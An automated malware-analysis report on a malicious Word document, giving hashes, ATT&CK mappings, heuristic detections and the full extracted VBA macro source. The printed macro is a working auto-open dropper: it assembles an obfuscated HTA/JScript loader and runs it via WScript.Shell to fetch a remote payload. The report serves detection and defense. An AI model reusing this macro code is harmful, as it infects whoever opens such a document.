Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0b034c00ad6eaeb7…

MALICIOUS

Office (OOXML)

80.4 KB Created: 2021-04-01 07:13:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-04-10
MD5: fb7b9177b9417ccb208463d491735c1a SHA-1: b933fa9140b7bc4141c9b8ee2b7f1691c03c4808 SHA-256: 0b034c00ad6eaeb7e153b60fbd9d2fa35a932d4ad8169335d0c3b1e5146fe06c
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1140 Deobfuscate/Decode Files or Information

The sample is an OOXML document containing VBA macros. The 'autoopen' subroutine triggers the execution of a WScript.Shell object, which is used to run a command constructed from obfuscated strings. This indicates an attempt to download and execute a secondary payload, a common technique for malware delivery.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set storageFuncProcedure = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set storageFuncProcedure = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9698 bytes
SHA-256: 64d2c96ce54cba44e1f6b6627ae2a30650f1b0b7e2d707a979539c3cb41a1c61
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{51CD720D-386D-4D67-9418-3D27B655EDD0}{C9A9638E-CB6A-4634-BE7B-AA1B2FB0511D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function screenCollectionBuf()
With frm.button1
screenCollectionBuf = .Tag
End With
End Function
Function windowRight()
With frm.button1
windowRight = .Caption
End With
End Function
Public Sub button1_Click()
Set storageFuncProcedure = CreateObject("wscript.shell")
storageFuncProcedure.exec p(screenCollectionBuf) & " " & p(windowRight)
End Sub


Attribute VB_Name = "titleRequest"
Sub autoopen()
mainRef
End Sub
Function intel(borderTableProcedure)
intel = "" & borderTableProcedure & ""
End Function
Sub mainRef()
Dim sizeVariableIterator As String
sizeVariableIterator = p(frm.button1.Caption)
Set nextConvert = New pointerBorderScreen
nextConvert.constLoadSelect sizeVariableIterator, captionValue
frm.button1_Click
End Sub
Function mainLoad(bufferSelect, ptrCopyPaste, memoryNext)
mainLoad = Replace(bufferSelect, ptrCopyPaste, memoryNext)
End Function

Attribute VB_Name = "nextQueryView"
Function leftTemp()
leftTemp = intel("<html><body><div id='content'>fTtlc29sYy5uZUx0bnVvQ25vaXRwZWN4ZT")
End Function
Function countClear()
countClear = intel("spMiAsImdwai53ZWlWbm9pdHBlY3hFdGhnaXJcXGNpbGJ1cFxcc3Jlc3VcXDpjIi")
End Function
Function ptrLocal()
ptrLocal = intel("hlbGlmb3RldmFzLm5lTHRudW9Dbm9pdHBlY3hlOyl5ZG9iZXNub3BzZXIubm9pdH")
End Function
Function bufferCollection()
bufferCollection = intel("BPcmV0bmlvcChldGlydy5uZUx0bnVvQ25vaXRwZWN4ZTsxID0gZXB5dC5uZUx0bn")
End Function
Function bufferCountBuffer()
bufferCountBuffer = intel("VvQ25vaXRwZWN4ZTtuZXBvLm5lTHRudW9Dbm9pdHBlY3hlOykibWFlcnRzLmJkb2")
End Function
Function collectionRightStruct()
collectionRightStruct = intel("RhIih0Y2VqYk9YZXZpdGNBIHdlbiA9IG5lTHRudW9Dbm9pdHBlY3hlIHJhdnspMD")
End Function
Function collectionCountPaste()
collectionCountPaste = intel("AyID09IHN1dGF0cy5ub2l0cE9yZXRuaW9wKGZpOykoZG5lcy5ub2l0cE9yZXRuaW")
End Function
Function AVariableRequest()
AVariableRequest = intel("9wOyllc2xhZiAsInIyRnBqTGVrS0NWTE1KeEJWTW1nZVU5RWRNZGE9aGNyYWVzJk")
End Function
Function varNamespace()
varNamespace = intel("lTUkxJPWZlciY0YWhlYTNjbFdqaVRMWUlGeno4WUw4PWhjcmFlcyZjNEpwTm9nYn")
End Function
Function dataStorage()
dataStorage = intel("NrPVhjMjBFemJpRUEmU05SQktlZUY4PUR6dG1nNUY/MjFuYXgvN2RmeUpIcnpVNX")
End Function
Function memCountDatabase()
memCountDatabase = intel("NreVVZNjViOEYvQWlWTXZOeEV4cUU3UVliSTVKeHMvQlNzdE8xcHczcFVUSjU4bk")
End Function
Function listboxTableCaption()
listboxTableCaption = intel("16SWZ6VE9oMUE1THhISHUySmovNDQ4Mzcvc3l1b2cvbW9jLjAyMDJzc2lldy1uZX")
End Function
Function varCaptionProc()
varCaptionProc = intel("R0aWsvLzpwdHRoIiAsIlRFRyIobmVwby5ub2l0cE9yZXRuaW9wOykicHR0aGxteC")
End Function
Function listIteratorArgument()
listIteratorArgument = intel("4ybG14c20iKHRjZWpiT1hldml0Y0Egd2VuID0gbm9pdHBPcmV0bmlvcCByYXY=|f")
End Function
Function ExTmp()
ExTmp = intel("XspZXppU2Vzbm9wc2VyKGhjdGFjfTspImF0aC53ZWlWbm9pdHBlY3hFdGhnaXJcX")
End Function
Function queryA()
queryA = intel("GNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmZXRlbGVkLm5vaXRwYUNjaXJlbmVHdG5lb")
End Function
Function countTitleTitle()
countTitleTitle = intel("XVjb2R7eXJ0OykidGNlamJvbWV0c3lzZWxpZi5nbml0cGlyY3MiKHRjZWpiT1hld")
End Function
Function selectGeneric()
selectGeneric = intel("ml0Y0Egd2VuID0gbm9pdHBhQ2NpcmVuZUd0bmVtdWNvZCByYXY7KSJncGoud2VpV")
End Function
Function classConvertNext()
classConvertNext = intel("m5vaXRwZWN4RXRoZ2lyXFxjaWxidXBcXHNyZXN1XFw6YyAyM3J2c2dlciIobnVyL")
End Function
Function documentCopySelect()
documentCopySelect = intel("ikibGxlaHMudHBpcmNzdyIodGNlamJPWGV2aXRjQSB3ZW4=</div><div id='ta")
End Function
Function titleA()
titleA = intel("ble1'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>012345678")
End Function
Function bufferWConvert()
bufferWConvert = intel("9+/</div><div id='table3'></div><script language='javascript'>fu")
End Function
Function nextOptionClass()
nextOptionClass = intel("nction tableFuncResponse(loadLocalMemory){return(new ActiveXObje")
End Function
Function refSizeW()
refSizeW = intel("ct(loadLocalMemory));}function WRequest(pasteTextbox){return(loc")
End Function
Function selectTitle()
selectTitle = intel("alLeft.getElementById(pasteTextbox).innerHTML);}function buttonC")
End Function
Function referenceGenericMemory()
referenceGenericMemory = intel("onstCount(){var tmpReference = WRequest('table1');var countWindo")
End Function
Function removeDocumentClass()
removeDocumentClass = intel("wClear = tmpReference.toLowerCase();var lenSize = WRequest('tabl")
End Function
Function documentListboxLink()
documentListboxLink = intel("e2');return(tmpReference + countWindowClear + lenSize);}function")
End Function
Function tableException()
tableException = intel(" sizeMainBuffer(s){var e={}; var i; var b=0; var c; var x; var l")
End Function
Function counterTextArgument()
counterTextArgument = intel("=0; var a; var copyTitle=''; var w=String.fromCharCode; var L=s.")
End Function
Function queryVariableList()
queryVariableList = intel("length;var countSelectStorage = 'charAt';for(i=0;i<64;i++){e[but")
End Function
Function clearRefTextbox()
clearRefTextbox = intel("tonConstCount()[countSelectStorage](i)]=i;}for(x=0;x<L;x++){c=e[")
End Function
Function ptrGlobalRight()
ptrGlobalRight = intel("s[countSelectStorage](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(")
End Function
Function loadEx()
loadEx = intel("l-=8))&0xff)||(x<(L-2)))&&(copyTitle+=w(a));}}return(copyTitle);")
End Function
Function nextCollectionIndex()
nextCollectionIndex = intel("};function nextDataRef(arrayVar){return arrayVar.split('').rever")
End Function
Function exceptionCounter()
exceptionCounter = intel("se().join('');}captionMemory = window;localLeft = document;capti")
End Function
Function responseButton()
responseButton = intel("onMemory.resizeTo(1, 1);captionMemory.moveTo(-100, -100);var vie")
End Function
Function variableQuery()
variableQuery = intel("wOptionRepo = localLeft.getElementById('content').innerHTML;var ")
End Function
Function borderLocalWindow()
borderLocalWindow = intel("viewOptionRepo = viewOptionRepo.split('|');var procedureGenericC")
End Function
Function structMemory()
structMemory = intel("ollection = nextDataRef(sizeMainBuffer(viewOptionRepo[0]));var o")
End Function
Function namespaceScreenOption()
namespaceScreenOption = intel("ptionVarView = nextDataRef(sizeMainBuffer(viewOptionRepo[1]));</")
End Function
Function procedureTitleConst()
procedureTitleConst = intel("script><script language='javascript'>function tableArgumentBuf(b")
End Function
Function globalDataProcedure()
globalDataProcedure = intel("uttonPointer){var clearPtrArgument = tableFuncResponse('msscript")
End Function
Function textboxGeneric()
textboxGeneric = intel("control.scriptcontrol');clearPtrArgument.Language = 'jscript';cl")
End Function
Function rightExCount()
rightExCount = intel("earPtrArgument.Timeout = 60000;clearPtrArgument.AddCode(buttonPo")
End Function
Function swapRepo()
swapRepo = intel("inter);return(null);}</script><script language='vbscript'>tableA")
End Function
Function tmpLib()
tmpLib = intel("rgumentBuf procedureGenericCollection : tableArgumentBuf optionV")
End Function
Function ExArgument()
ExArgument = intel("arView : captionMemory.close</script></body></html>")
End Function
Function captionValue()
captionValue = leftTemp + countClear + ptrLocal + bufferCollection + bufferCountBuffer + collectionRightStruct + collectionCountPaste + AVariableRequest + varNamespace + dataStorage + memCountDatabase + listboxTableCaption + varCaptionProc + listIteratorArgument + ExTmp + queryA + countTitleTitle + selectGeneric + classConvertNext + documentCopySelect + titleA + bufferWConvert + nextOptionClass + refSizeW + selectTitle + referenceGenericMemory + removeDocumentClass + documentListboxLink + tableException + counterTextArgument + queryVariableList + clearRefTextbox + ptrGlobalRight + loadEx + nextCollectionIndex + exceptionCounter + responseButton + variableQuery + borderLocalWindow + structMemory + namespaceScreenOption + procedureTitleConst + globalDataProcedure + textboxGeneric + rightExCount + swapRepo + tmpLib + ExArgument
End Function

Attribute VB_Name = "pointerBorderScreen"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub constLoadSelect(trustGenericStorage As String, responseCaptionWindow As String)
Dim optionTitleScreen As FileSystemObject
Set optionTitleScreen = New FileSystemObject
Dim rightViewDelete As TextStream
Set rightViewDelete = optionTitleScreen.CreateTextFile(trustGenericStorage)
rightViewDelete.WriteLine responseCaptionWindow
rightViewDelete.Close
Set rightViewDelete = Nothing
Set optionTitleScreen = Nothing
End Sub

Attribute VB_Name = "convertArray"
Function p(valuePaste)
p = mainLoad(valuePaste, "@", "")
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 40448 bytes
SHA-256: f8bcb5048dea606e6359fea2bbdd8010e10891cdb832062847d6345e61fc7e0e

Open this report in the interactive analyzer, or submit your own file for analysis.